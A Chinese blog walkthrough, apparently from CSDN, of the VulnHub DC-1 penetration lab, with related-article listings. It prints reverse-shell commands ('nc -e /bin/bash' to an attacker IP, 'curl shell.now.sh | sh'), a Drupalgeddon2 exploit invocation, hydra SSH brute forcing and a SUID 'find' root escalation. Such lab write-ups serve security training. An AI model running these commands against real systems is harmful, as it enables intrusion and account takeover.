DC靶场1-6

最新推荐文章于 2025-05-07 16:14:33 发布
最新推荐文章于 2025-05-07 16:14:33 发布
阅读量2.9k 收藏 12
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透靶机学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42133828/article/details/99680059
本文详细介绍了DC系列靶场的渗透测试过程,包括DC1至DC6的端口扫描、信息收集、漏洞利用、shell反弹、权限提升及flag获取。涉及的技巧包括nmap扫描、网站漏洞利用、密码爆破、数据库交互、ssh远程登录和提权等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机下载:

https://download.vulnhub.com/dc/

环境配置:

在VM以net连接打开虚拟机

使用的机器:

攻击机:kali linux 靶机:DC1,2,4,5,6(IP随配)

 

DC1

1.nmap扫描端口

nmap -sS -A 192.168.119.135

2. 访问页面,收集信息

http://192.168.119.135:80

F12查看版本信息

去网上搜索,发现此版本存在一个CVE漏洞(CVE-2018-7600)

3. 反弹shell

1)搜索相关脚本,运行,直接反弹shell https://github.com/pimps/CVE-2018-7600 执行命令: python drupa7-CVE-2018-7600.py http://192.168.119.135/ -c 'nc -e /bin/bash 192.168.119.129 4444'

2)当然,小编建议还是使用python反弹shell,不要问我为什么,我是后面才造python反弹的shell要好一些 python反弹shell命令

反弹 curl https://shell.now.sh/192.168.119.129:4444 |sh
获得shell后,输入:python -c 'import pty; pty.spawn("/bin/bash")'

3)使用msf自带的exp,获得shell

4.获得flag1

获得shell后,直接显示当前目录查看文件

查看flag1.txt

5.获得flag2

根据flag1.txt提示,查找drupal的配置文件 网上搜索,在 /var/www/site/default/settings.php

6.获得flag4

根据 flag2 提示要爆破,还显示了数据库的账号,密码,尝试连接数据库 到了这里,我想我上面在反弹shell那里就建议使用第二种的用处到来了,如果是使用python直接反弹shell,那么就可以直接使用命令连接数据库

但是,若是第一种,和msf方法的话,我想,是不大好连的 所以小编我就独辟蹊径,先去拿到flag4 flag4的位置在/home目录下 查看flag4.txt

从提示的信息来看,我们flag在root里面,还是通过find方法获得root权限 但是,这样还是不够的,小编还是想要按着步骤来,想办法找到flag3 顺道,查看一下/etc/passwd有没有可以远程登陆的账号

看到有flag4这个账号,使用hydra尝试ssh密码爆破

hydra -l flag4 -P /usr/share/john/password.lst -t 6 ssh://192.168.119.135

ssh登陆flag4账号 ssh flag4@192.168.119.135

连接数据库 mysql -host lo

最低0.47元/天 解锁文章

200万优质内容无限畅学
Vulnhub DC-6靶场
weixin_47019868的博客
11-21 657
Vulnhub DC-6靶场
DC-6靶场
qq_49518993的博客
08-31 1325
DC-6靶场
Day10 DC-6DC-9靶场WP
最新发布
泷羽Sec-静安
05-07 817
关注 **泷羽Sec**和**泷羽Sec-静安**公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具
DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
热门推荐
金 帛的博客
06-29 2万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
DC靶场系列--DC1
BGiscool的博客
06-28 5746
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC靶场系列-DC1靶场-渗透测试靶场
03-09
DC-1靶场.zip文件则是一个压缩包文件,包含了DC1靶场的完整环境和必要的资源文件,供测试者下载并使用。通过模拟实际渗透测试的工作环境,测试者可以在此环境下尝试各种渗透测试技术,如SQL注入、跨站脚本攻击(XSS)...
DC靶场系列-DC9靶场-渗透测试靶场
03-06
DC靶场系列中的DC9靶场是一个专门为渗透测试练习而设计的模拟环境。它允许测试者在没有法律风险的环境下进行各种网络攻击手段的实践,如SQL注入、XSS攻击、目录遍历等,从而提高自身的技术水平和安全意识。 DC9靶场...
DC系列靶场---DC 1靶场的渗透测试(一)
zhouA0221的博客
07-17 1673
也就是提示我们去查看这个CMS的配置文件。因为Drupal是开源的所以我们是可以通过搜索引擎搜到配置文件的路径的。我们的思路可以从官方文档中查找一些关于drupal7的密码恢复之类的文件。这里用户有两个用户,我们只需要关注admin这个用户,这个应该是网站管理员的账户和密码。我们已经成功登录到目标主机的mysql数据库了,我们看一下数据库中有哪些重要的信息。看到这是flag2,从flag2中我们可以看到这是mysql的账号和密码。看到一个users的数据表,这个表中我们通过名字应该能猜测到这个是用户表。
DC系列靶场---DC 9靶场的渗透测试
zhouA0221的博客
08-13 1605
先利用openssl命令创建一个密码,得到hash密码我们切换到tmp目录下,新建一个文件再回到/opt/devstuff/dist/test目录,执行程序test,将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了,接下来然后使用命令su - xiao切换到我们添加的xiao用户,输入之前设置好密码即可登录。这里我们看到一个password文件,打开之后看到好多个秘密,我把密码放到我们的passwd文件中。
DC-6 靶场演练
猎荒者
03-04 844
Stand Out Fit In 环境准备 Kali Linux(IP:10.10.16.128) DC-6 靶机 NAT 网络连接 主机发现 端口扫描 目录爆破 漏洞挖掘 漏洞利用 ...
DC-1靶场详解
苏生要努力
03-12 3209
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
DC-6靶场练习
weixin_52985767的博客
12-27 614
DC-6靶场复现
DC靶场部署
xt_beginner的博客
01-10 623
DC靶场部署 官网下载连接:https://www.vulnhub.com 下载之后,使用VMware Workstation Pro导入靶场环境 一、解压 二、选择以VMware方式打开 三、存储路径选择解压路径 四、vof版本高于4.0,点击重试即可导入 Vof版本查看: 找到vmware安装目录,搜索OVFTool进入OVFTool目录,查看readme.txt,即可查看vof版本。 五、开始导入 打开虚拟机 ...
DC6-靶机
Au
10-30 1797
下载地址 下面是作者的提示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
DC-2靶场
mlws1900的博客
03-22 1090
直接点击无法下载可以用迅雷下设置网络为nat模式,其他的错误全部点重试和是打开靶机,启动如下图所示。
DC-6靶场实战
qq_42754807的博客
03-26 1611
DC-6靶场实战
DC-1靶场(CVE-2018-7600)
lionwerson的博客
10-14 1995
1.下载DC-1靶场: DC-1下载地址https://download.vulnhub.com/dc/DC-1.zip2.解压打开靶场,导入虚拟机网络模式改为桥接模式,打开虚拟机。 3.浏览器访问80端口,其实也可以先用nmap扫描一下端口。 是一个Drupal CMS。 4.先挂扫描器走一波。 发现存在CVE-2018-7600的Drupal的一个RCE,并且小于7的版本都可以,这个应该就是这个靶场的主要漏洞了。 poc如下: 漏洞存在,验证 poc: #!/usr/b..
DC系列靶场DC-3
weixin_74778939的博客
03-30 2272
读取命名管道 h 的内容,并将读取的内容传递给一个交互式的Shell,并将标准错误重定向到标准输出。将这个标准输出通过管道传递给 nc 命令,该命令会建立一个到攻击者主机指定端口的网络连接,将远程主机发送回来的数据写入命名管道 h,形成循环以便远程主机可以发送命令到本地系统。对bsms_admin这个表搞了半天,结果这个表的名字应该是 #__bsms_admin,我还以为前面的#和__不用打。跑出来了76个表,观察了一下,里面的bsms_admin和users 表,应该存在着我们想要的信息。
DC-1靶场
03-21
<think>好的,我现在需要帮助用户查找与DC-1靶场相关的IT内容或项目。首先,用户提供的引用中有提到DC-1渗透靶场实战速通版,引用[4]提到了一些具体步骤,比如退出数据库、查看用户信息等。这可能意味着DC-1是一个用于渗透测试练习的靶机,常见于网络安全训练中。 接下来,我需要确认DC-1靶场的基本信息。通常,像DC-1这样的靶场是设计用来模拟真实环境中的漏洞,供安全研究人员和爱好者练习渗透测试技术。根据引用[3],里面提到了Drupal 8、PHP、Apache、Debian系统,这些可能是DC-1靶场使用的技术栈。用户可能想知道靶场的技术实现细节,比如包含哪些漏洞,如何搭建,或者如何利用这些漏洞进行渗透。 然后,我需要检查用户提供的引用是否有其他相关信息。引用[1]是关于加入技术社群的,引用[2]看起来像是一个反向shell的命令,可能与渗透测试中的利用方法有关,而引用[4]提到了具体的渗透步骤,如查看/etc/passwd文件,这可能涉及到用户枚举或权限提升的环节。 用户的问题是要查找与DC-1靶场相关的IT项目或技术实现,所以需要整理这些信息,说明DC-1靶场可能涉及的技术组件、漏洞类型以及渗透测试的方法。例如,Drupal可能存在已知漏洞,如CVE-2018-7600,Apache的版本可能有配置问题,Debian系统可能涉及内核漏洞等。此外,用户可能对如何搭建这样的靶场或进行实战演练感兴趣,所以需要涵盖搭建步骤和渗透路径。 另外,需要确保回答符合系统级指令,比如使用正确的中文,数学公式的格式(虽然这里可能用不到),以及生成相关问题。同时,引用需要正确标注,比如引用[3]和[4]中的信息。 最后,生成的相关问题需要围绕DC-1靶场的技术细节、渗透方法、漏洞分析以及学习资源展开,帮助用户进一步探索。</think>关于DC-1靶场的技术实现与应用,以下是关键信息整理: ### DC-1靶场概述 DC-1是专为渗透测试训练设计的虚拟机靶场,模拟了包含多个漏洞的Web应用环境。其核心组件包括: - **CMS系统**:Drupal 8(存在CVE-2018-7600远程代码执行漏洞)[^3] - **Web服务**:Apache HTTP Server 2.4.25 - **操作系统**:Debian Linux - **数据库**:MySQL/MariaDB(通过`tac /etc/passwd`可发现数据库用户信息)[^4] ### 渗透测试路径示例 1. **漏洞利用**:通过Drupalgeddon2漏洞获取初始立足点 ```bash msfconsole> use exploit/unix/webapp/drupal_drupalgeddon2 set RHOSTS <靶机IP> exploit ``` 2. **权限提升**:利用Linux内核漏洞或SUID提权(如发现`find`命令具有SUID权限): ```bash find / -exec /bin/sh \; -quit ``` 3. **敏感信息获取**:通过`/etc/passwd`分析用户列表,`/var/www`目录查找数据库凭证 ### 技术实现特点 - **多层防御突破**:包含Web应用漏洞、操作系统配置缺陷、数据库安全防护等复合型漏洞 - **真实环境模拟**:采用LAMP架构(Linux+Apache+MySQL+PHP)构建企业级应用场景 - **隐蔽后门设计**:存在可通过`nc 192.168.233.130 55555`建立反向Shell的网络通道[^2]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值